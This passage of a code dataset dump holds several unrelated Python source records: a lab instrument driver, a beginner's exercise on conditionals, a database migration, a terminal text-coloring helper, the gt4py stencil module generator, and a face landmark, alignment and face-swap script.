len(args)==1:\n gpib.send('\\\"MOUT ' + self.controlLoop + ', ' + str(args[0]) + '\\\"', self.address)\n else:\n gpib.send('HTR?', self.address)\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n def get_setpoint(self):\n \"\"\"Get Control Loop Setpoint.\n\n :Return: Returns the control loop setpoint.\n \"\"\"\n gpib.send('\\\"SETP? ' + self.controlLoop + '\\\"', self.address)\n # return float(gpib.receive(self.address))\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n def t(self, *args):\n \"\"\"Set/get temperature.\n\n t() queries temperature.\n t(setpoint) sets the setpoint temperature of the selected input.\n\n :params setpoint: temperature setpoint in Kelvin.\n \"\"\"\n\n # if len(args)==1:\n # gpib.send('\\\"SETP ' + self.controlLoop + ', ' + str(args[0]) + '\\\"', self.address)\n # else:\n # gpib.send('\\\"KRDG? ' + self.input + '\\\"', self.address)\n # return float(gpib.receive(self.address))\n\n if len(args)==1:\n gpib.send('\\\"SETP ' + self.controlLoop + ', ' + str('{:.3f}'.format(float(args[0]))) + '\\\"', self.address)\n else:\n gpib.send('\\\"KRDG? 
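# A hedged usage sketch for the LockProcess defined in the tornado_etcd record
# above: lock() resolves its Future with a (flag, token) pair, and unlock()
# must be handed the same token back. This assumes LockProcess is importable
# from that module; the key name, ttl, and servers below are placeholders.
from tornado import gen
from tornado.ioloop import IOLoop

ETCD_SERVERS = (("127.0.0.1", 2379),)

@gen.coroutine
def guarded_section():
    locker = LockProcess("/watch", ETCD_SERVERS, None)     # class defined above
    flag, token = yield locker.lock("resource-a", ttl=30)  # ttl guards against crashed holders
    try:
        pass  # critical section: at most one holder of "resource-a" at a time
    finally:
        locker.unlock("resource-a", token)  # the token check prevents foreign unlocks

if __name__ == "__main__":
    IOLoop.current().run_sync(guarded_section)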
' + self.input + '\\\"', self.address)\n        try:\n            return float(gpib.receive(self.address))\n        except ValueError:\n            print('ERROR: Communication lost.')\n","repo_name":"cwgaldino/amreft-m4p","sub_path":"amreft-mp4/Lakeshore.py","file_name":"Lakeshore.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35912307482","text":"# First, user input is required\n# input()\n\nname = input('enter your name : ')\ngrade = input('enter your grade : ')\ncompany = input('enter your company : ')\n\nprint(name, grade, company)\n\nscore = int(input('Enter your score: '))\nprint(score)\n\nprint(type(score)) # int\n\n\n# Python control statements\n# if, if ~else, if ~ elif ~ else\n# bool True: non-zero numbers, non-empty strings, lists, tuples, dictionaries\nif not False :\n    print('Bad') # Bad\n\nif False :\n    print(\"Bad\")\nelse :\n    print(\"good\") # good\n\n# How to test whether the value below is a multiple of 3 or of 5?\nnumber = 3\nif number % 3 == 0 or number % 5 == 0:\n    print(\"{} is a multiple of 3 or 5\".format(number))\n\nelse :\n    print('{} is a multiple of neither 3 nor 5'.format(number))\n\n\n# Leap year condition:\n# a multiple of 4 that is not a multiple of 100, or a multiple of 400\n# Use if statements to read a year and a month and print the last day of that month\n\nfrom datetime import date, datetime,timedelta\n\n\n\nyear = int(input('Enter a year: '))\nmonth = int(input('Enter a month: '))\nyear_month = [31,28,31,30,31,30,31,31,30,31,30,31]\nleap_year_month = [31,29,31,30,31,30,31,31,30,31,30,31]\n\n\n\nif (year % 4 == 0 and year % 100 != 0) :\n    print('Last day of the month: {} '.format(leap_year_month[month-1]))\nelif (year % 400 == 0):\n    print('Last day of the month: {} '.format(leap_year_month[month-1]))\nelse :\n    print('Not a leap year; last day of the month: {}'.format(year_month[month-1]))\n\n\n\n# Nested conditionals\n# Grade A and a score of 95 or higher: 100% scholarship\n# Grade A and a score of 90 or higher: 90% scholarship\n# Any other grade: 50% scholarship\n\ngrade=input('Enter a grade: ')\ntotal=int(input('Enter a score: '))\n\nif grade == 'A':\n    if total >= 95 :\n        print(\"100% scholarship\")\n    else :\n        print(\"90% scholarship\")\nelse :\n    print(\"50% scholarship\")\n\n\n\narea = ['Seoul','Busan','Jeju']\nregion = 'Suwon'\n\nif region in area :\n    pass\nelse :\n    print('Region {} is not included'.format(region))\n\n\nmydict = {'Seoul':100, 'Gwangju':200}\nregion = 'Busan'\nif region in mydict:\n    print('The key exists')\nelse:\n    print('The key does not exist')\n\n\nnum = 9\nresult = 0\nif num >= 5 :\n    result = num * 2\nelse:\n    result = num + 2\nprint(result)\n\n# Ternary operator\nresult = num*2 if (num>=5) else num +2\nprint(result)\n\n\n# Truthiness checks\ncity =' '\nif city :\n    print(city)\nelse :\n    print('Please')\n\nmoney = ''\nif money :\n    print('Have a nice lunch')\nelse :\n    print('ㅠㅡㅠ')\n\n# Read one value from the user and print that value minus 20\n# The output range is limited to 0~255\n# e.g. if the result would be below 0 print 0, and above 255 print 255\nnum = int(input('Enter a number: '))\n\nif num <0 :\n    print('0')\nelif 0 None:\n    for role in roles:\n        role = Role(name=role)\n        session.add(role)\n        try:\n            session.commit()\n        except IntegrityError:\n            pass\n\n\n@create_sync_session\ndef downgrade(session: Session = None) -> None:\n    for role in roles:\n        session.execute(\n            sa.delete(Role)\n            .where(Role.name == role)\n        )\n        session.commit()\n","repo_name":"ArtsemDev/bh_exam_57","sub_path":"alembic/versions/23464356d0f3_insert_roles.py","file_name":"23464356d0f3_insert_roles.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45659226405","text":"import numpy as np\n\n# https://github.com/allenwind/text-color-render\n\n# ANSI escape code\nansi_code_ids = [15, 224, 217, 210, 203, 9, 160, 124, 88]\nlength = len(ansi_code_ids)\n\nhexcolors = [\n    \"#f5f5ff\",\n    \"#ffe0e0\",\n    \"#ffb6b6\",\n    
\"#ff8d8d\",\n \"#ff6363\",\n \"#ff3939\",\n \"#ff1010\",\n \"#f20000\",\n \"#dd0000\",\n \"#c80000\",\n \"#b40000\",\n \"#9f0000\",\n \"#8a0000\",\n]\nhex_lenght = len(hexcolors)\n\ntemplate = \"\\033[38;5;{value}m{string}\\033[0m\"\ndef print_color_text(text, ws, end=False):\n ws = np.array(ws)\n ws = (ws - np.min(ws)) / (np.max(ws) - np.min(ws)) * 0.99\n for string, w in zip(text, ws):\n vid = int(w * length)\n value = ansi_code_ids[vid]\n print(template.format(string=string, value=value), end=\"\")\n if end:\n print()\n\nmarkdown_template = '{}'\ndef render_color_markdown(text, ws):\n ws = np.array(ws)\n ws = (ws - np.min(ws)) / (np.max(ws) - np.min(ws)) * 0.99\n ss = []\n for string, w in zip(text, ws):\n i = int(w * hex_lenght)\n ss.append(markdown_template.format(hexcolors[i], string))\n return \"\".join(ss)\n\nif __name__ == \"__main__\":\n # for testing\n import string\n text = string.ascii_letters\n print_color_text(text, np.arange(len(text)))\n print(render_color_markdown(text, np.arange(len(text))))\n","repo_name":"allenwind/text-signification-in-rnn","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4870140577","text":"import abc\nimport numbers\nimport os\nimport textwrap\nfrom dataclasses import dataclass, field\nfrom inspect import getdoc\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Set\n\nimport jinja2\nimport numpy\n\nfrom gt4py import ir as gt_ir\nfrom gt4py import utils as gt_utils\nfrom gt4py.definitions import AccessKind, Boundary, DomainInfo, FieldInfo, ParameterInfo\nfrom gtc import gtir, gtir_to_oir\nfrom gtc.passes.gtir_k_boundary import compute_k_boundary, compute_min_k_size\nfrom gtc.passes.gtir_pipeline import GtirPipeline\nfrom gtc.passes.oir_access_kinds import compute_access_kinds\nfrom gtc.passes.oir_optimizations.utils import compute_fields_extents\nfrom gtc.utils import dimension_flags_to_names\n\n\nif TYPE_CHECKING:\n from gt4py.stencil_builder import StencilBuilder\n\n\n@dataclass\nclass ModuleData:\n field_info: Dict[str, FieldInfo] = field(default_factory=dict)\n parameter_info: Dict[str, ParameterInfo] = field(default_factory=dict)\n unreferenced: List[str] = field(default_factory=list)\n\n @property\n def field_names(self) -> Set[str]:\n \"\"\"Set of all field names.\"\"\"\n return set(self.field_info.keys())\n\n @property\n def parameter_names(self) -> Set[str]:\n \"\"\"Set of all parameter names.\"\"\"\n return set(self.parameter_info.keys())\n\n\ndef make_args_data_from_gtir(pipeline: GtirPipeline) -> ModuleData:\n \"\"\"\n Compute module data containing information about stencil arguments from gtir.\n\n This is no longer compatible with the legacy backends.\n \"\"\"\n data = ModuleData()\n\n # NOTE: pipeline.gtir has not had prune_unused_parameters applied.\n all_params = pipeline.gtir.params\n\n node = pipeline.full()\n oir = gtir_to_oir.GTIRToOIR().visit(node)\n field_extents = compute_fields_extents(oir)\n accesses = compute_access_kinds(oir)\n\n for decl in (param for param in all_params if isinstance(param, gtir.FieldDecl)):\n access = accesses[decl.name]\n dtype = numpy.dtype(decl.dtype.name.lower())\n\n if access != AccessKind.NONE:\n k_boundary = compute_k_boundary(node)[decl.name]\n boundary = Boundary(*field_extents[decl.name].to_boundary()[0:2], k_boundary)\n else:\n boundary = Boundary.zeros(ndims=3)\n\n data.field_info[decl.name] = FieldInfo(\n access=access,\n 
boundary=boundary,\n axes=tuple(dimension_flags_to_names(decl.dimensions).upper()),\n data_dims=tuple(decl.data_dims),\n dtype=dtype,\n )\n\n for decl in (param for param in all_params if isinstance(param, gtir.ScalarDecl)):\n access = accesses[decl.name]\n dtype = numpy.dtype(decl.dtype.name.lower())\n data.parameter_info[decl.name] = ParameterInfo(access=access, dtype=dtype)\n\n data.unreferenced = [*sorted(name for name in accesses if accesses[name] == AccessKind.NONE)]\n return data\n\n\nclass BaseModuleGenerator(abc.ABC):\n\n SOURCE_LINE_LENGTH = 120\n TEMPLATE_INDENT_SIZE = 4\n DOMAIN_ARG_NAME = \"_domain_\"\n ORIGIN_ARG_NAME = \"_origin_\"\n SPLITTERS_NAME = \"_splitters_\"\n\n TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), \"templates\", \"stencil_module.py.in\")\n\n _builder: Optional[\"StencilBuilder\"]\n args_data: ModuleData\n template: jinja2.Template\n\n def __init__(self, builder: Optional[\"StencilBuilder\"] = None):\n self._builder = builder\n self.args_data = ModuleData()\n with open(self.TEMPLATE_PATH, \"r\") as f:\n self.template = jinja2.Template(f.read())\n\n def __call__(\n self,\n args_data: ModuleData,\n builder: Optional[\"StencilBuilder\"] = None,\n **kwargs: Any,\n ) -> str:\n \"\"\"\n Generate source code for a Python module containing a StencilObject.\n\n A possible reaosn for extending is processing additional kwargs,\n using a different template might require completely overriding.\n \"\"\"\n if builder:\n self._builder = builder\n self.args_data = args_data\n\n module_source = self.template.render(\n imports=self.generate_imports(),\n module_members=self.generate_module_members(),\n class_name=self.generate_class_name(),\n class_members=self.generate_class_members(),\n docstring=self.generate_docstring(),\n gt_backend=self.generate_backend_name(),\n gt_source=self.generate_sources(),\n gt_domain_info=self.generate_domain_info(),\n gt_field_info=repr(self.args_data.field_info),\n gt_parameter_info=repr(self.args_data.parameter_info),\n gt_constants=self.generate_constants(),\n gt_options=self.generate_options(),\n stencil_signature=self.generate_signature(),\n field_names=self.args_data.field_names,\n param_names=self.args_data.parameter_names,\n pre_run=self.generate_pre_run(),\n post_run=self.generate_post_run(),\n implementation=self.generate_implementation(),\n )\n if self.builder.options.as_dict()[\"format_source\"]:\n module_source = gt_utils.text.format_source(\n module_source, line_length=self.SOURCE_LINE_LENGTH\n )\n\n return module_source\n\n @property\n def builder(self) -> \"StencilBuilder\":\n \"\"\"\n Expose the builder reference.\n\n Raises a runtime error if the builder reference is not initialized.\n This is necessary because other parts of the public API depend on it before it is\n guaranteed to be initialized.\n \"\"\"\n if not self._builder:\n raise RuntimeError(\"Builder attribute not initialized!\")\n return self._builder\n\n @property\n def backend_name(self) -> str:\n return self.builder.backend.name\n\n @abc.abstractmethod\n def generate_implementation(self) -> str:\n \"\"\"Generate the work code inside the stencil object's run function.\"\"\"\n pass\n\n def generate_imports(self) -> str:\n \"\"\"Generate import statements and related code for the stencil class module.\"\"\"\n return \"\"\n\n def generate_class_name(self) -> str:\n \"\"\"\n Generate the name of the stencil class.\n\n This should ususally be deferred to the chosen caching strategy via\n the builder object (see default implementation).\n \"\"\"\n return 
self.builder.class_name\n\n def generate_docstring(self) -> str:\n \"\"\"\n Generate the docstring of the stencil object.\n\n The default is to return the stencil definition's docstring or an\n empty string.\n The output should be least based on the stencil definition's docstring,\n if one exists.\n \"\"\"\n return getdoc(self.builder.definition) or \"\"\n\n def generate_backend_name(self) -> str:\n \"\"\"\n Return the name of the backend.\n\n There should never be a need to override this.\n \"\"\"\n return self.backend_name\n\n def generate_sources(self) -> Dict[str, str]:\n \"\"\"\n Return the source code of the stencil definition in string format.\n\n This is unlikely to require overriding.\n \"\"\"\n if self.builder.definition_ir.sources is not None:\n return {\n key: gt_utils.text.format_source(value, line_length=self.SOURCE_LINE_LENGTH)\n for key, value in self.builder.definition_ir.sources\n }\n return {}\n\n def generate_constants(self) -> Dict[str, str]:\n \"\"\"\n Return a mapping of named numeric constants passed as externals.\n\n This is unlikely to require overriding.\n \"\"\"\n if self.builder.definition_ir.externals:\n return {\n name: repr(value)\n for name, value in self.builder.definition_ir.externals.items()\n if isinstance(value, numbers.Number)\n }\n return {}\n\n def generate_options(self) -> Dict[str, Any]:\n \"\"\"\n Return dictionary of build options.\n\n Must exclude options that should never be cached.\n \"\"\"\n return {\n key: value\n for key, value in self.builder.options.as_dict().items()\n if key not in [\"build_info\"]\n }\n\n def generate_domain_info(self) -> str:\n \"\"\"\n Generate a ``DomainInfo`` constructor call with the correct arguments.\n\n Might require overriding for module generators of non-cartesian backends.\n \"\"\"\n parallel_axes = self.builder.definition_ir.domain.parallel_axes or []\n sequential_axis = self.builder.definition_ir.domain.sequential_axis.name\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n min_sequential_axis_size = 0\n else:\n min_sequential_axis_size = compute_min_k_size(self.builder.gtir_pipeline.full())\n domain_info = repr(\n DomainInfo(\n parallel_axes=tuple(ax.name for ax in parallel_axes),\n sequential_axis=sequential_axis,\n min_sequential_axis_size=min_sequential_axis_size,\n ndim=len(parallel_axes) + (1 if sequential_axis else 0),\n )\n )\n return domain_info\n\n def generate_module_members(self) -> str:\n \"\"\"\n Generate additional module level code after all imports.\n\n May contain any executable module level code including function and class defs.\n \"\"\"\n return \"\"\n\n def generate_class_members(self) -> str:\n \"\"\"\n Generate additional stencil class members.\n\n May contain any class level code including methods.\n \"\"\"\n return \"\"\n\n def generate_signature(self) -> str:\n \"\"\"\n Generate the stencil definition specific part of the stencil object's ``__call__`` signature.\n\n Unlikely to require overriding.\n \"\"\"\n args = []\n keyword_args = [\"*\"]\n for arg in self.builder.definition_ir.api_signature:\n if arg.is_keyword:\n if arg.default is not gt_ir.Empty:\n keyword_args.append(\n \"{name}={default}\".format(name=arg.name, default=arg.default)\n )\n else:\n keyword_args.append(arg.name)\n else:\n if arg.default is not gt_ir.Empty:\n args.append(\"{name}={default}\".format(name=arg.name, default=arg.default))\n else:\n args.append(arg.name)\n\n if len(keyword_args) > 1:\n args.extend(keyword_args)\n signature = \", \".join(args)\n\n return signature\n\n def generate_pre_run(self) -> 
str:\n \"\"\"Additional code to be run just before the run method (implementation) is called.\"\"\"\n return \"\"\n\n def generate_post_run(self) -> str:\n \"\"\"Additional code to be run just after the run method (implementation) is called.\"\"\"\n return \"\"\n\n\ndef iir_is_not_emtpy(implementation_ir: gt_ir.StencilImplementation) -> bool:\n return bool(implementation_ir.multi_stages)\n\n\ndef gtir_is_not_emtpy(pipeline: GtirPipeline) -> bool:\n node = pipeline.full()\n return bool(node.iter_tree().if_isinstance(gtir.ParAssignStmt).to_list())\n\n\ndef iir_has_effect(implementation_ir: gt_ir.StencilImplementation) -> bool:\n return bool(implementation_ir.has_effect)\n\n\ndef gtir_has_effect(pipeline: GtirPipeline) -> bool:\n return True\n\n\nclass PyExtModuleGenerator(BaseModuleGenerator):\n \"\"\"\n Module Generator for use with backends that generate c++ python extensions.\n\n Will either use ImplementationIR or GTIR depending on the backend's USE_LEGACY_TOOLCHAIN\n class attribute. Using with other IRs requires subclassing and overriding ``_is_not_empty()``\n and ``_has_effect()`` methods.\n \"\"\"\n\n pyext_module_name: Optional[str]\n pyext_file_path: Optional[str]\n\n def __init__(self):\n super().__init__()\n self.pyext_module_name = None\n self.pyext_file_path = None\n\n def __call__(\n self,\n args_data: ModuleData,\n builder: Optional[\"StencilBuilder\"] = None,\n **kwargs: Any,\n ) -> str:\n self.pyext_module_name = kwargs[\"pyext_module_name\"]\n self.pyext_file_path = kwargs[\"pyext_file_path\"]\n return super().__call__(args_data, builder, **kwargs)\n\n def _is_not_empty(self) -> bool:\n if self.pyext_module_name is None:\n return False\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n return iir_is_not_emtpy(self.builder.implementation_ir)\n return gtir_is_not_emtpy(self.builder.gtir_pipeline)\n\n def generate_imports(self) -> str:\n source = [\"from gt4py import utils as gt_utils\"]\n if self._is_not_empty():\n assert self.pyext_file_path is not None\n file_path = 'f\"{{pathlib.Path(__file__).parent.resolve()}}/{}\"'.format(\n os.path.basename(self.pyext_file_path)\n )\n source.append(\n textwrap.dedent(\n f\"\"\"\n pyext_module = gt_utils.make_module_from_file(\n \"{self.pyext_module_name}\", {file_path}, public_import=True\n )\n \"\"\"\n )\n )\n return \"\\n\".join(source)\n\n def _has_effect(self) -> bool:\n if not self._is_not_empty():\n return False\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n return iir_has_effect(self.builder.implementation_ir)\n return gtir_has_effect(self.builder.gtir_pipeline)\n\n def generate_implementation(self) -> str:\n definition_ir = self.builder.definition_ir\n sources = gt_utils.text.TextBlock(indent_size=BaseModuleGenerator.TEMPLATE_INDENT_SIZE)\n\n args = []\n api_fields = set(field.name for field in definition_ir.api_fields)\n for arg in definition_ir.api_signature:\n if arg.name not in self.args_data.unreferenced:\n args.append(arg.name)\n if arg.name in api_fields:\n args.append(\"list(_origin_['{}'])\".format(arg.name))\n\n # only generate implementation if any multi_stages are present. e.g. 
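# The module generators above funnel everything through a single
# jinja2.Template.render() call with keyword placeholders. A minimal stand-in
# with an inline template string (the real stencil_module.py.in template and
# its placeholder names are not reproduced here):
import jinja2

template = jinja2.Template(
    "class {{ class_name }}(StencilObject):\n    backend = '{{ gt_backend }}'\n"
)
print(template.render(class_name="MyStencil", gt_backend="example-backend"))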
if no statement in the\n # stencil has any effect on the API fields, this may not be the case since they could be\n # pruned.\n if self._has_effect():\n source = textwrap.dedent(\n f\"\"\"\n # Load or generate a GTComputation object for the current domain size\n pyext_module.run_computation({\",\".join([\"list(_domain_)\", *args, \"exec_info\"])})\n \"\"\"\n )\n sources.extend(source.splitlines())\n else:\n sources.extend(\"\\n\")\n\n return sources.text\n\n\nclass CUDAPyExtModuleGenerator(PyExtModuleGenerator):\n def generate_implementation(self) -> str:\n source = super().generate_implementation()\n if self.builder.options.backend_opts.get(\"device_sync\", True):\n source += textwrap.dedent(\n \"\"\"\n cupy.cuda.Device(0).synchronize()\n \"\"\"\n )\n return source\n\n def generate_imports(self) -> str:\n source = (\n textwrap.dedent(\n \"\"\"\n import cupy\n \"\"\"\n )\n + super().generate_imports()\n )\n return source\n","repo_name":"tehrengruber/gt4py","sub_path":"src/gt4py/backend/module_generator.py","file_name":"module_generator.py","file_ext":"py","file_size_in_byte":15389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4098078202","text":"import pickle\r\nimport cv2\r\nimport mtcnn\r\nimport os\r\nimport numpy as np\r\nimport dlib\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom scipy.spatial.distance import euclidean\r\n\r\n\r\ndef detectFaceLandmarks():\r\n face_detector = mtcnn.MTCNN()\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n x, img = cap.read()\r\n results = face_detector.detect_faces(img)\r\n\r\n for res in results:\r\n x1, y1, width, height = res['box']\r\n x2, y2 = x1 + width, y1 + height\r\n\r\n key_points = res['keypoints'].values()\r\n\r\n for point in key_points:\r\n cv2.circle(img, point, 5, (0, 255, 0), thickness=-1)\r\n\r\n cv2.imshow('Image', img)\r\n\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n\r\n\r\ndef anotationsToSomethingNormal():\r\n annotations = {}\r\n with open(\"list_landmarks_celeba.txt\", \"r\") as file:\r\n for line in file:\r\n line = line.split()\r\n key = line[0]\r\n line.pop(0)\r\n outputLine = [[line[0], line[1]], [line[2], line[3]], [line[4], line[5]], [line[6], line[7]],\r\n [line[8], line[9]]]\r\n annotations.update({key: outputLine})\r\n\r\n with open('annotations.txt', 'wb') as fp:\r\n pickle.dump(annotations, fp)\r\n\r\n return annotations\r\n\r\n\r\ndef getDataFromPhotos():\r\n i = 0\r\n face_detector = mtcnn.MTCNN()\r\n dataFound = {}\r\n\r\n for filename in os.listdir('data'):\r\n img = cv2.imread('data/' + filename)\r\n results = face_detector.detect_faces(img)\r\n\r\n for res in results:\r\n key_points = res['keypoints']\r\n left_eye = list(key_points.get('left_eye'))\r\n right_eye = list(key_points.get('right_eye'))\r\n nose = list(key_points.get('nose'))\r\n mouth_left = list(key_points.get('mouth_left'))\r\n mouth_right = list(key_points.get('mouth_right'))\r\n\r\n outputList = [left_eye, right_eye, nose, mouth_left, mouth_right]\r\n\r\n print(i)\r\n print(filename)\r\n print(outputList)\r\n i += 1\r\n dataFound.update({filename: outputList})\r\n\r\n with open('foundCoordinates.txt', 'wb') as fo:\r\n pickle.dump(dataFound, fo)\r\n\r\n return dataFound\r\n\r\n\r\ndef calculateMSE(annotations, foundCoordinates):\r\n for x in annotations:\r\n annotations[x] = list(np.float_(annotations[x]))\r\n for i in foundCoordinates:\r\n foundCoordinates[i] = list(np.float_(foundCoordinates[i]))\r\n\r\n outputDictionary = {}\r\n totalMSE = 0.0\r\n for key in 
foundCoordinates:\r\n outputDictionary.update({key: [[foundCoordinates.get(key)], [annotations.get(key)],\r\n mean_squared_error(annotations.get(key), foundCoordinates.get(key))]})\r\n totalMSE = mean_squared_error(annotations.get(key), foundCoordinates.get(key)) + totalMSE\r\n\r\n totalMSE = totalMSE / len(foundCoordinates)\r\n print('Total MSE: ', totalMSE)\r\n return outputDictionary\r\n\r\n\r\ndef loadEverything():\r\n with open('annotations.txt', 'rb') as fp:\r\n annotations = pickle.load(fp)\r\n\r\n with open('foundCoordinates.txt', 'rb') as fo:\r\n foundCoordinates = pickle.load(fo)\r\n\r\n return annotations, foundCoordinates\r\n\r\n\r\n# https://www.youtube.com/watch?v=81lCsiNBvrM&t=429s&ab_channel=PracticalAI\r\n# https://github.com/Practical-AI/Face/blob/master/_04_face_alignment/01_face_alignment.py\r\ndef align(img, left_eye_pos, right_eye_pos, size=(150, 150), eye_pos=(0.35, 0.35)):\r\n width, height = size\r\n eye_pos_w, eye_pos_h = eye_pos\r\n\r\n l_e, r_e = left_eye_pos, right_eye_pos\r\n\r\n dy = r_e[1] - l_e[1]\r\n dx = r_e[0] - l_e[0]\r\n dist = euclidean(l_e, r_e)\r\n scale = (width * (1 - 2 * eye_pos_w)) / dist\r\n\r\n center = ((l_e[0] + r_e[0]) // 2, (l_e[1] + r_e[1]) // 2)\r\n angle = np.degrees(np.arctan2(dy, dx)) + 360\r\n\r\n m = cv2.getRotationMatrix2D(center, angle, scale)\r\n tx = width * 0.5\r\n ty = height * eye_pos_h\r\n m[0, 2] += (tx - center[0])\r\n m[1, 2] += (ty - center[1])\r\n\r\n aligned_face = cv2.warpAffine(img, m, (width, height))\r\n return aligned_face\r\n\r\n\r\ndef alignFaces(foundCoordinates):\r\n for key in foundCoordinates:\r\n img = cv2.imread('data/' + key)\r\n value = foundCoordinates.get(key)\r\n left_eye = tuple([value[0][0], value[0][1]])\r\n right_eye = tuple([value[1][0], value[1][1]])\r\n aligned = align(img, left_eye, right_eye)\r\n cv2.imwrite('faces/' + key, aligned)\r\n cv2.imshow('foto', aligned)\r\n cv2.waitKey(0)\r\n\r\n\r\n# https://automaticaddison.com/how-to-blend-multiple-images-using-opencv/\r\ndef getAverageImage():\r\n image_data = []\r\n for filename in os.listdir('data'):\r\n img = cv2.imread('faces/' + filename)\r\n if img is not None:\r\n image_data.append(img)\r\n\r\n dst = image_data[0]\r\n\r\n for i in range(len(image_data)):\r\n if i == 0:\r\n pass\r\n else:\r\n alpha = 1.0 / (i + 1)\r\n beta = 1.0 - alpha\r\n dst = cv2.addWeighted(image_data[i], alpha, dst, beta, 0.0)\r\n\r\n cv2.imshow('Average face', dst)\r\n cv2.waitKey(0)\r\n return dst\r\n\r\n\r\ndef getMostSimilarImage(averageImage):\r\n err = 9999999\r\n for filename in os.listdir('faces'):\r\n img = cv2.imread('faces/' + filename)\r\n\r\n errNow = np.sum((averageImage.astype(\"float\") - img.astype(\"float\")) ** 2)\r\n errNow /= float(averageImage.shape[0] * averageImage.shape[1])\r\n\r\n print(errNow)\r\n\r\n if errNow < err:\r\n err = errNow\r\n mostSilimarImage = cv2.imread('faces/' + filename)\r\n\r\n cv2.imshow('Most Silimar Image', mostSilimarImage)\r\n cv2.waitKey(0)\r\n return mostSilimarImage\r\n\r\n\r\n# https://pysource.com/2019/05/28/face-swapping-explained-in-8-steps-opencv-with-python/\r\ndef faceSwap(inputwebcam, secondface):\r\n def extract_index_nparray(nparray):\r\n index = None\r\n for num in nparray[0]:\r\n index = num\r\n break\r\n return index\r\n\r\n img = inputwebcam\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask = np.zeros_like(img_gray)\r\n img2 = secondface\r\n img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\r\n\r\n detector = dlib.get_frontal_face_detector()\r\n predictor = 
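# --- Editor's usage sketch (hypothetical inputs) ---
# align() above rotates and scales a face so that both eyes land at fixed
# relative positions; in this script the eye centers come from the MTCNN
# keypoints stored in foundCoordinates. The file path and eye coordinates
# below are made up for illustration.
def align_demo(path='data/000001.jpg'):
    img = cv2.imread(path)
    if img is None:
        return None
    left_eye, right_eye = (68, 112), (108, 110)  # hypothetical detections
    # Default output is a 150x150 crop; pass size=... for other resolutions.
    return align(img, left_eye, right_eye, size=(224, 224))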
dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\r\n height, width, channels = img2.shape\r\n img2_new_face = np.zeros((height, width, channels), np.uint8)\r\n\r\n # Face 1\r\n faces = detector(img_gray)\r\n for face in faces:\r\n landmarks = predictor(img_gray, face)\r\n landmarks_points = []\r\n for n in range(0, 68):\r\n x = landmarks.part(n).x\r\n y = landmarks.part(n).y\r\n landmarks_points.append((x, y))\r\n\r\n points = np.array(landmarks_points, np.int32)\r\n convexhull = cv2.convexHull(points)\r\n # cv2.polylines(img, [convexhull], True, (255, 0, 0), 3)\r\n cv2.fillConvexPoly(mask, convexhull, 255)\r\n\r\n face_image_1 = cv2.bitwise_and(img, img, mask=mask)\r\n\r\n # Delaunay triangulation\r\n rect = cv2.boundingRect(convexhull)\r\n subdiv = cv2.Subdiv2D(rect)\r\n subdiv.insert(landmarks_points)\r\n triangles = subdiv.getTriangleList()\r\n triangles = np.array(triangles, dtype=np.int32)\r\n\r\n indexes_triangles = []\r\n for t in triangles:\r\n pt1 = (t[0], t[1])\r\n pt2 = (t[2], t[3])\r\n pt3 = (t[4], t[5])\r\n\r\n index_pt1 = np.where((points == pt1).all(axis=1))\r\n index_pt1 = extract_index_nparray(index_pt1)\r\n\r\n index_pt2 = np.where((points == pt2).all(axis=1))\r\n index_pt2 = extract_index_nparray(index_pt2)\r\n\r\n index_pt3 = np.where((points == pt3).all(axis=1))\r\n index_pt3 = extract_index_nparray(index_pt3)\r\n\r\n if index_pt1 is not None and index_pt2 is not None and index_pt3 is not None:\r\n triangle = [index_pt1, index_pt2, index_pt3]\r\n indexes_triangles.append(triangle)\r\n\r\n # Face 2\r\n faces2 = detector(img2_gray)\r\n for face in faces2:\r\n landmarks = predictor(img2_gray, face)\r\n landmarks_points2 = []\r\n for n in range(0, 68):\r\n x = landmarks.part(n).x\r\n y = landmarks.part(n).y\r\n landmarks_points2.append((x, y))\r\n\r\n points2 = np.array(landmarks_points2, np.int32)\r\n convexhull2 = cv2.convexHull(points2)\r\n\r\n lines_space_mask = np.zeros_like(img_gray)\r\n lines_space_new_face = np.zeros_like(img2)\r\n # Triangulation of both faces\r\n for triangle_index in indexes_triangles:\r\n # Triangulation of the first face\r\n tr1_pt1 = landmarks_points[triangle_index[0]]\r\n tr1_pt2 = landmarks_points[triangle_index[1]]\r\n tr1_pt3 = landmarks_points[triangle_index[2]]\r\n triangle1 = np.array([tr1_pt1, tr1_pt2, tr1_pt3], np.int32)\r\n\r\n rect1 = cv2.boundingRect(triangle1)\r\n (x, y, w, h) = rect1\r\n cropped_triangle = img[y: y + h, x: x + w]\r\n cropped_tr1_mask = np.zeros((h, w), np.uint8)\r\n\r\n points = np.array([[tr1_pt1[0] - x, tr1_pt1[1] - y],\r\n [tr1_pt2[0] - x, tr1_pt2[1] - y],\r\n [tr1_pt3[0] - x, tr1_pt3[1] - y]], np.int32)\r\n\r\n cv2.fillConvexPoly(cropped_tr1_mask, points, 255)\r\n\r\n # Lines space\r\n cv2.line(lines_space_mask, tr1_pt1, tr1_pt2, 255)\r\n cv2.line(lines_space_mask, tr1_pt2, tr1_pt3, 255)\r\n cv2.line(lines_space_mask, tr1_pt1, tr1_pt3, 255)\r\n lines_space = cv2.bitwise_and(img, img, mask=lines_space_mask)\r\n\r\n # 